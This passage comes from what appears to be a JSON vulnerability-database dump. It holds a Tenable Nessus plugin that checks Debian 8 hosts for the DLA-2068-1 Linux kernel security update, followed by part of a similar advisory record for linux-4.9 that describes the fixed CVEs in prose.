\"CVE-2019-17133\", \"CVE-2019-17666\", \"CVE-2019-19051\", \"CVE-2019-19052\", \"CVE-2019-19056\", \"CVE-2019-19057\", \"CVE-2019-19062\", \"CVE-2019-19066\", \"CVE-2019-19227\", \"CVE-2019-19332\", \"CVE-2019-19523\", \"CVE-2019-19524\", \"CVE-2019-19527\", \"CVE-2019-19530\", \"CVE-2019-19531\", \"CVE-2019-19532\", \"CVE-2019-19533\", \"CVE-2019-19534\", \"CVE-2019-19536\", \"CVE-2019-19537\", \"CVE-2019-19767\", \"CVE-2019-19922\", \"CVE-2019-19947\", \"CVE-2019-19965\", \"CVE-2019-19966\", \"CVE-2019-2215\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Debian DLA-2068-1 : linux security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities have been discovered in the Linux kernel that\nmay lead to a privilege escalation, denial of service, or information\nleak.\n\nCVE-2019-2215\n\nThe syzkaller tool discovered a use-after-free vulnerability in the\nAndroid binder driver. A local user on a system with this driver\nenabled could use this to cause a denial of service (memory corruption\nor crash) or possibly for privilege escalation. However, this driver\nis not enabled on Debian packaged kernels.\n\nCVE-2019-10220\n\nVarious developers and researchers found that if a crafted file-\nsystem or malicious file server presented a directory with filenames\nincluding a '/' character, this could confuse and possibly defeat\nsecurity checks in applications that read the directory.\n\nThe kernel will now return an error when reading such a\ndirectory, rather than passing the invalid filenames on to\nuser-space.\n\nCVE-2019-14895, CVE-2019-14901\n\nADLab of Venustech discovered potential heap buffer overflows in the\nmwifiex wifi driver. On systems using this driver, a malicious\nWireless Access Point or adhoc/P2P peer could use these to cause a\ndenial of service (memory corruption or crash) or possibly for remote\ncode execution.\n\nCVE-2019-14896, CVE-2019-14897\n\nADLab of Venustech discovered potential heap and stack buffer\noverflows in the libertas wifi driver. On systems using this driver, a\nmalicious Wireless Access Point or adhoc/P2P peer could use these to\ncause a denial of service (memory corruption or crash) or possibly for\nremote code execution.\n\nCVE-2019-15098\n\nHui Peng and Mathias Payer reported that the ath6kl wifi driver did\nnot properly validate USB descriptors, which could lead to a NULL pointer derefernce. An attacker able to add USB devices could use this\nto cause a denial of service (BUG/oops).\n\nCVE-2019-15217\n\nThe syzkaller tool discovered that the zr364xx mdia driver did not\ncorrectly handle devices without a product name string, which could\nlead to a NULL pointer dereference. An attacker able to add USB\ndevices could use this to cause a denial of service (BUG/oops).\n\nCVE-2019-15291\n\nThe syzkaller tool discovered that the b2c2-flexcop-usb media driver\ndid not properly validate USB descriptors, which could lead to a NULL pointer dereference. An attacker able to add USB devices could use\nthis to cause a denial of service (BUG/oops).\n\nCVE-2019-15505\n\nThe syzkaller tool discovered that the technisat-usb2 media driver did\nnot properly validate incoming IR packets, which could lead to a heap\nbuffer over-read. An attacker able to add USB devices could use this\nto cause a denial of service (BUG/oops) or to read sensitive\ninformation from kernel memory.\n\nCVE-2019-16746\n\nIt was discovered that the wifi stack did not validate the content of\nbeacon heads provided by user-space for use on a wifi interface in\nAccess Point mode, which could lead to a heap buffer overflow. A local\nuser permitted to configure a wifi interface could use this to cause a\ndenial of service (memory corruption or crash) or possibly for\nprivilege escalation.\n\nCVE-2019-17052, CVE-2019-17053, CVE-2019-17054, CVE-2019-17055,\nCVE-2019-17056\n\nOri Nimron reported that various network protocol implementations\n\n - AX.25, IEEE 802.15.4, Appletalk, ISDN, and NFC - allowed\n all users to create raw sockets. A local user could use\n this to send arbitrary packets on networks using those\n protocols.\n\nCVE-2019-17133\n\nNicholas Waisman reported that the wifi stack did not valdiate\nreceived SSID information before copying it, which could lead to a\nbuffer overflow if it is not validated by the driver or firmware. A\nmalicious Wireless Access Point might be able to use this to cause a\ndenial of service (memory corruption or crash) or for remote code\nexecution.\n\nCVE-2019-17666\n\nNicholas Waisman reported that the rtlwifi wifi drivers did not\nproperly validate received P2P information, leading to a buffer\noverflow. A malicious P2P peer could use this to cause a denial of\nservice (memory corruption or crash) or for remote code execution.\n\nCVE-2019-19051\n\nNavid Emamdoost discovered a potential memory leak in the i2400m wimax\ndriver if the software rfkill operation fails. The security impact of\nthis is unclear.\n\nCVE-2019-19052\n\nNavid Emamdoost discovered a potential memory leak in the gs_usb CAN\ndriver if the open (interface-up) operation fails. The security impact\nof this is unclear.\n\nCVE-2019-19056, CVE-2019-19057\n\nNavid Emamdoost discovered potential memory leaks in the mwifiex wifi\ndriver if the probe operation fails. The security impact of this is\nunclear.\n\nCVE-2019-19062\n\nNavid Emamdoost discovered a potential memory leak in the AF_ALG\nsubsystem if the CRYPTO_MSG_GETALG operation fails. A local user could\npossibly use this to cause a denial of service (memory exhaustion).\n\nCVE-2019-19066\n\nNavid Emamdoost discovered a potential memory leak in the bfa SCSI\ndriver if the get_fc_host_stats operation fails. The security impact\nof this is unclear.\n\nCVE-2019-19227\n\nDan Carpenter reported missing error checks in the Appletalk protocol\nimplementation that could lead to a NULL pointer dereference. The\nsecurity impact of this is unclear.\n\nCVE-2019-19332\n\nThe syzkaller tool discovered a missing bounds check in the KVM\nimplementation for x86, which could lead to a heap buffer overflow. A\nlocal user permitted to use KVM could use this to cause a denial of\nservice (memory corruption or crash) or possibly for privilege\nescalation.\n\nCVE-2019-19523\n\nThe syzkaller tool discovered a use-after-free bug in the adutux USB\ndriver. An attacker able to add and remove USB devices could use this\nto cause a denial of service (memory corruption or crash) or possibly\nfor privilege escalation.\n\nCVE-2019-19524\n\nThe syzkaller tool discovered a race condition in the ff-memless\nlibrary used by input drivers. An attacker able to add and remove USB\ndevices could use this to cause a denial of service (memory corruption\nor crash) or possibly for privilege escalation.\n\nCVE-2019-19527\n\nThe syzkaller tool discovered that the hiddev driver did not correctly\nhandle races between a task opening the device and disconnection of\nthe underlying hardware. A local user permitted to access hiddev\ndevices, and able to add and remove USB devices, could use this to\ncause a denial of service (memory corruption or crash) or possibly for\nprivilege escalation.\n\nCVE-2019-19530\n\nThe syzkaller tool discovered a potential use-after-free in the\ncdc-acm network driver. An attacker able to add USB devices could use\nthis to cause a denial of service (memory corruption or crash) or\npossibly for privilege escalation.\n\nCVE-2019-19531\n\nThe syzkaller tool discovered a use-after-free bug in the yurex USB\ndriver. An attacker able to add and remove USB devices could use this\nto cause a denial of service (memory corruption or crash) or possibly\nfor privilege escalation.\n\nCVE-2019-19532\n\nThe syzkaller tool discovered a potential heap buffer overflow in the\nhid-gaff input driver, which was also found to exist in many other\ninput drivers. An attacker able to add USB devices could use this to\ncause a denial of service (memory corruption or crash) or possibly for\nprivilege escalation.\n\nCVE-2019-19533\n\nThe syzkaller tool discovered that the ttusb-dec media driver was\nmissing initialisation of a structure, which could leak sensitive\ninformation from kernel memory.\n\nCVE-2019-19534, CVE-2019-19536\n\nThe syzkaller tool discovered that the peak_usb CAN driver was missing\ninitialisation of some structures, which could leak sensitive\ninformation from kernel memory.\n\nCVE-2019-19537\n\nThe syzkaller tool discovered race conditions in the USB stack,\ninvolving character device registration. An attacker able to add USB\ndevices could use this to cause a denial of service (memory corruption\nor crash) or possibly for privilege escalation.\n\nCVE-2019-19767\n\nThe syzkaller tool discovered that crafted ext4 volumes could trigger\na buffer overflow in the ext4 filesystem driver. An attacker able to\nmount such a volume could use this to cause a denial of service\n(memory corruption or crash) or possibly for privilege escalation.\n\nCVE-2019-19922\n\nIt was discovered that a change in Linux 3.16.61, 'sched/fair: Fix\nbandwidth timer clock drift condition', could lead to tasks being\nthrottled before using their full quota of CPU time. A local user\ncould use this bug to slow down other users' tasks. This change has\nbeen reverted.\n\nCVE-2019-19947\n\nIt was discovered that the kvaser_usb CAN driver was missing\ninitialisation of some structures, which could leak sensitive\ninformation from kernel memory.\n\nCVE-2019-19965\n\nGao Chuan reported a race condition in the libsas library used by SCSI\nhost drivers, which could lead to a NULL pointer dereference. An\nattacker able to add and remove SCSI devices could use this to cause a\ndenial of service (BUG/oops).\n\nCVE-2019-19966\n\nThe syzkaller tool discovered a missing error check in the cpia2 media\ndriver, which could lead to a use-after-free. An attacker able to add\nUSB devices could use this to cause a denial of service (memory\ncorruption or crash) or possibly for privilege escalation.\n\nFor Debian 8 'Jessie', these problems have been fixed in version\n3.16.81-1.\n\nWe recommend that you upgrade your linux packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2020/01/msg00013.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/linux\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Android Binder Use-After-Free Exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-compiler-gcc-4.8-arm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-compiler-gcc-4.8-x86\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-compiler-gcc-4.9-x86\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-doc-3.16\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-3.16.0-9-586\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-3.16.0-9-686-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-3.16.0-9-all\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-3.16.0-9-all-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-3.16.0-9-all-armel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-3.16.0-9-all-armhf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-3.16.0-9-all-i386\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-3.16.0-9-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-3.16.0-9-armmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-3.16.0-9-armmp-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-3.16.0-9-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-3.16.0-9-ixp4xx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-3.16.0-9-kirkwood\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-3.16.0-9-orion5x\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-3.16.0-9-versatile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-3.16.0-9-586\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-3.16.0-9-686-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-3.16.0-9-686-pae-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-3.16.0-9-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-3.16.0-9-amd64-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-3.16.0-9-armmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-3.16.0-9-armmp-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-3.16.0-9-ixp4xx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-3.16.0-9-kirkwood\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-3.16.0-9-orion5x\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-3.16.0-9-versatile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-libc-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-manual-3.16\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-source-3.16\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-support-3.16.0-9\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:xen-linux-system-3.16.0-9-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/08/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/01/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/01/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"linux-compiler-gcc-4.8-arm\", reference:\"3.16.81-1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-compiler-gcc-4.8-x86\", reference:\"3.16.81-1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-compiler-gcc-4.9-x86\", reference:\"3.16.81-1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-doc-3.16\", reference:\"3.16.81-1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-586\", reference:\"3.16.81-1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-686-pae\", reference:\"3.16.81-1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-all\", reference:\"3.16.81-1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-all-amd64\", reference:\"3.16.81-1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-all-armel\", reference:\"3.16.81-1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-all-armhf\", reference:\"3.16.81-1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-all-i386\", reference:\"3.16.81-1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-amd64\", reference:\"3.16.81-1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-armmp\", reference:\"3.16.81-1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-armmp-lpae\", reference:\"3.16.81-1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-common\", reference:\"3.16.81-1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-ixp4xx\", reference:\"3.16.81-1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-kirkwood\", reference:\"3.16.81-1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-orion5x\", reference:\"3.16.81-1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-versatile\", reference:\"3.16.81-1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-9-586\", reference:\"3.16.81-1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-9-686-pae\", reference:\"3.16.81-1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-9-686-pae-dbg\", reference:\"3.16.81-1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-9-amd64\", reference:\"3.16.81-1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-9-amd64-dbg\", reference:\"3.16.81-1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-9-armmp\", reference:\"3.16.81-1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-9-armmp-lpae\", reference:\"3.16.81-1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-9-ixp4xx\", reference:\"3.16.81-1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-9-kirkwood\", reference:\"3.16.81-1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-9-orion5x\", reference:\"3.16.81-1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-9-versatile\", reference:\"3.16.81-1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-libc-dev\", reference:\"3.16.81-1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-manual-3.16\", reference:\"3.16.81-1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-source-3.16\", reference:\"3.16.81-1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-support-3.16.0-9\", reference:\"3.16.81-1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"xen-linux-system-3.16.0-9-amd64\", reference:\"3.16.81-1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:58:07", "description": "Several vulnerabilities have been discovered in the Linux kernel that may lead to a privilege escalation, denial of service or information leaks.\n\nCVE-2018-13093, CVE-2018-13094\n\nWen Xu from SSLab at Gatech reported several NULL pointer dereference flaws that may be triggered when mounting and operating a crafted XFS volume. An attacker able to mount arbitrary XFS volumes could use this to cause a denial of service (crash).\n\nCVE-2018-20976\n\nIt was discovered that the XFS file-system implementation did not correctly handle some mount failure conditions, which could lead to a use-after-free. The security impact of this is unclear.\n\nCVE-2018-21008\n\nIt was discovered that the rsi wifi driver did not correctly handle some failure conditions, which could lead to a use-after- free. The security impact of this is unclear.\n\nCVE-2019-0136\n\nIt was discovered that the wifi soft-MAC implementation (mac80211) did not properly authenticate Tunneled Direct Link Setup (TDLS) messages.\nA nearby attacker could use this for denial of service (loss of wifi connectivity).\n\nCVE-2019-2215\n\nThe syzkaller tool discovered a use-after-free vulnerability in the Android binder driver. A local user on a system with this driver enabled could use this to cause a denial of service (memory corruption or crash) or possibly for privilege escalation. However, this driver is not enabled on Debian packaged kernels.\n\nCVE-2019-10220\n\nVarious developers and researchers found that if a crafted file- system or malicious file server presented a directory with filenames including a '/' character, this could confuse and possibly defeat security checks in applications that read the directory.\n\nThe kernel will now return an error when reading such a directory, rather than passing the invalid filenames on to user-space.\n\nCVE-2019-14615\n\nIt was discovered that Intel 9th and 10th generation GPUs did not clear user-visible state during a context switch, which resulted in information leaks between GPU tasks. This has been mitigated in the i915 driver.\n\nThe affected chips (gen9 and gen10) are listed at <https://en.wikipedia.org/wiki/List_of_Intel_graphics_proces sing_units#Gen9>.\n\nCVE-2019-14814, CVE-2019-14815, CVE-2019-14816\n\nMultiple bugs were discovered in the mwifiex wifi driver, which could lead to heap buffer overflows. A local user permitted to configure a device handled by this driver could probably use this for privilege escalation.\n\nCVE-2019-14895, CVE-2019-14901\n\nADLab of Venustech discovered potential heap buffer overflows in the mwifiex wifi driver. On systems using this driver, a malicious Wireless Access Point or adhoc/P2P peer could use these to cause a denial of service (memory corruption or crash) or possibly for remote code execution.\n\nCVE-2019-14896, CVE-2019-14897\n\nADLab of Venustech discovered potential heap and stack buffer overflows in the libertas wifi driver. On systems using this driver, a malicious Wireless Access Point or adhoc/P2P peer could use these to cause a denial of service (memory corruption or crash) or possibly for remote code execution.\n\nCVE-2019-15098\n\nHui Peng and Mathias Payer reported that the ath6kl wifi driver did not properly validate USB descriptors, which could lead to a NULL pointer derefernce. An attacker able to add USB devices could use this to cause a denial of service (BUG/oops).\n\nCVE-2019-15217\n\nThe syzkaller tool discovered that the zr364xx mdia driver did not correctly handle devices without a product name string, which could lead to a NULL pointer dereference. An attacker able to add USB devices could use this to cause a denial of service (BUG/oops).\n\nCVE-2019-15291\n\nThe syzkaller tool discovered that the b2c2-flexcop-usb media driver did not properly validate USB descriptors, which could lead to a NULL pointer dereference. An attacker able to add USB devices could use this to cause a denial of service (BUG/oops).\n\nCVE-2019-15505\n\nThe syzkaller tool discovered that the technisat-usb2 media driver did not properly validate incoming IR packets, which could lead to a heap buffer over-read. An attacker able to add USB devices could use this to cause a denial of service (BUG/oops) or to read sensitive information from kernel memory.\n\nCVE-2019-15917\n\nThe syzkaller tool found a race condition in code supporting UART-attached Bluetooth adapters, which could lead to a use- after-free. A local user with access to a pty device or other suitable tty device could use this to cause a denial of service (memory corruption or crash) or possibly for privilege escalation.\n\nCVE-2019-16746\n\nIt was discovered that the wifi stack did not validate the content of beacon heads provided by user-space for use on a wifi interface in Access Point mode, which could lead to a heap buffer overflow. A local user permitted to configure a wifi interface could use this to cause a denial of service (memory corruption or crash) or possibly for privilege escalation.\n\nCVE-2019-17052, CVE-2019-17053, CVE-2019-17054, CVE-2019-17055, CVE-2019-17056\n\nOri Nimron reported that various network protocol implementations\n\n - AX.25, IEEE 802.15.4, Appletalk, ISDN, and NFC - allowed all users to create raw sockets. A local user could use this to send arbitrary packets on networks using those protocols.\n\nCVE-2019-17075\n\nIt was found that the cxgb4 Infiniband driver requested DMA (Direct Memory Access) to a stack-allocated buffer, which is not supported and on some systems can result in memory corruption of the stack. A local user might be able to use this for denial of service (memory corruption or crash) or possibly for privilege escalation.\n\nCVE-2019-17133\n\nNicholas Waisman reported that the wifi stack did not valdiate received SSID information before copying it, which could lead to a buffer overflow if it is not validated by the driver or firmware. A malicious Wireless Access Point might be able to use this to cause a denial of service (memory corruption or crash) or for remote code execution.\n\nCVE-2019-17666\n\nNicholas Waisman reported that the rtlwifi wifi drivers did not properly validate received P2P information, leading to a buffer overflow. A malicious P2P peer could use this to cause a denial of service (memory corruption or crash) or for remote code execution.\n\nCVE-2019-18282\n\nJonathan Berger, Amit Klein, and Benny Pinkas discovered that the generation of UDP/IPv6 flow labels used a weak hash function, 'jhash'.\nThis could enable tracking individual computers as they communicate with different remote servers and from different networks. The 'siphash' function is now used instead.\n\nCVE-2019-18683\n\nMultiple race conditions were discovered in the vivid media driver, used for testing Video4Linux2 (V4L2) applications, These race conditions could result in a use-after-free. On a system where this driver is loaded, a user with permission to access media devices could use this to cause a denial of service (memory corruption or crash) or possibly for privilege escalation.\n\nCVE-2019-18809\n\nNavid Emamdoost discovered a potential memory leak in the af9005 media driver if the device fails to respond to a command. The security impact of this is unclear.\n\nCVE-2019-19037\n\nIt was discovered that the ext4 filesystem driver did not correctly handle directories with holes (unallocated regions) in them. An attacker able to mount arbitrary ext4 volumes could use this to cause a denial of service (crash).\n\nCVE-2019-19051\n\nNavid Emamdoost discovered a potential memory leak in the i2400m wimax driver if the software rfkill operation fails. The security impact of this is unclear.\n\nCVE-2019-19052\n\nNavid Emamdoost discovered a potential memory leak in the gs_usb CAN driver if the open (interface-up) operation fails. The security impact of this is unclear.\n\nCVE-2019-19056, CVE-2019-19057\n\nNavid Emamdoost discovered potential memory leaks in the mwifiex wifi driver if the probe operation fails. The security impact of this is unclear.\n\nCVE-2019-19062\n\nNavid Emamdoost discovered a potential memory leak in the AF_ALG subsystem if the CRYPTO_MSG_GETALG operation fails. A local user could possibly use this to cause a denial of service (memory exhaustion).\n\nCVE-2019-19066\n\nNavid Emamdoost discovered a potential memory leak in the bfa SCSI driver if the get_fc_host_stats operation fails. The security impact of this is unclear.\n\nCVE-2019-19068\n\nNavid Emamdoost discovered a potential memory leak in the rtl8xxxu wifi driver, in case it fails to submit an interrupt buffer to the device. The security impact of this is unclear.\n\nCVE-2019-19227\n\nDan Carpenter reported missing error checks in the Appletalk protocol implementation that could lead to a NULL pointer dereference. The security impact of this is unclear.\n\nCVE-2019-19332\n\nThe syzkaller tool discovered a missing bounds check in the KVM implementation for x86, which could lead to a heap buffer overflow. A local user permitted to use KVM could use this to cause a denial of service (memory corruption or crash) or possibly for privilege escalation.\n\nCVE-2019-19447\n\nIt was discovered that the ext4 filesystem driver did not safely handle unlinking of an inode that, due to filesystem corruption, already has a link count of 0. An attacker able to mount arbitrary ext4 volumes could use this to cause a denial of service (memory corruption or crash) or possibly for privilege escalation.\n\nCVE-2019-19523\n\nThe syzkaller tool discovered a use-after-free bug in the adutux USB driver. An attacker able to add and remove USB devices could use this to cause a denial of service (memory corruption or crash) or possibly for privilege escalation.\n\nCVE-2019-19524\n\nThe syzkaller tool discovered a race condition in the ff-memless library used by input drivers. An attacker able to add and remove USB devices could use this to cause a denial of service (memory corruption or crash) or possibly for privilege escalation.\n\nCVE-2019-19525\n\nThe syzkaller tool discovered a use-after-free bug in the atusb driver for IEEE 802.15.4 networking. An attacker able to add and remove USB devices could possibly use this to cause a denial of service (memory corruption or crash) or for privilege escalation.\n\nCVE-2019-19527\n\nThe syzkaller tool discovered that the hiddev driver did not correctly handle races between a task opening the device and disconnection of the underlying hardware. A local user permitted to access hiddev devices, and able to add and remove USB devices, could use this to cause a denial of service (memory corruption or crash) or possibly for privilege escalation.\n\nCVE-2019-19530\n\nThe syzkaller tool discovered a potential use-after-free in the cdc-acm network driver. An attacker able to add USB devices could use this to cause a denial of service (memory corruption or crash) or possibly for privilege escalation.\n\nCVE-2019-19531\n\nThe syzkaller tool discovered a use-after-free bug in the yurex USB driver. An attacker able to add and remove USB devices could use this to cause a denial of service (memory corruption or crash) or possibly for privilege escalation.\n\nCVE-2019-19532\n\nThe syzkaller tool discovered a potential heap buffer overflow in the hid-gaff input driver, which was also found to exist in many other input drivers. An attacker able to add USB devices could use this to cause a denial of service (memory corruption or crash) or possibly for privilege escalation.\n\nCVE-2019-19533\n\nThe syzkaller tool discovered that the ttusb-dec media driver was missing initialisation of a structure, which could leak sensitive information from kernel memory.\n\nCVE-2019-19534, CVE-2019-19535, CVE-2019-19536\n\nThe syzkaller tool discovered that the peak_usb CAN driver was missing initialisation of some structures, which could leak sensitive information from kernel memory.\n\nCVE-2019-19537\n\nThe syzkaller tool discovered race conditions in the USB stack, involving character device registration. An attacker able to add USB devices could use this to cause a denial of service (memory corruption or crash) or possibly for privilege escalation.\n\nCVE-2019-19767\n\nThe syzkaller tool discovered that crafted ext4 volumes could trigger a buffer overflow in the ext4 filesystem driver. An attacker able to mount such a volume could use this to cause a denial of service (memory corruption or crash) or possibly for privilege escalation.\n\nCVE-2019-19947\n\nIt was discovered that the kvaser_usb CAN driver was missing initialisation of some structures, which could leak sensitive information from kernel memory.\n\nCVE-2019-19965\n\nGao Chuan reported a race condition in the libsas library used by SCSI host drivers, which could lead to a NULL pointer dereference. An attacker able to add and remove SCSI devices could use this to cause a denial of service (BUG/oops).\n\nCVE-2019-20096\n\nThe Hulk Robot tool discovered a potential memory leak in the DCCP protocol implementation. This may be exploitable by local users, or by remote attackers if the system uses DCCP, to cause a denial of service (out of memory).\n\nFor Debian 8 'Jessie', these problems have been fixed in version 4.9.210-1~deb8u1. This update additionally fixes Debian bugs #869511 and 945023; and includes many more bug fixes from stable updates 4.9.190-4.9.210 inclusive.\n\nWe recommend that you upgrade your linux-4.9 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2020-03-06T00:00:00", "type": 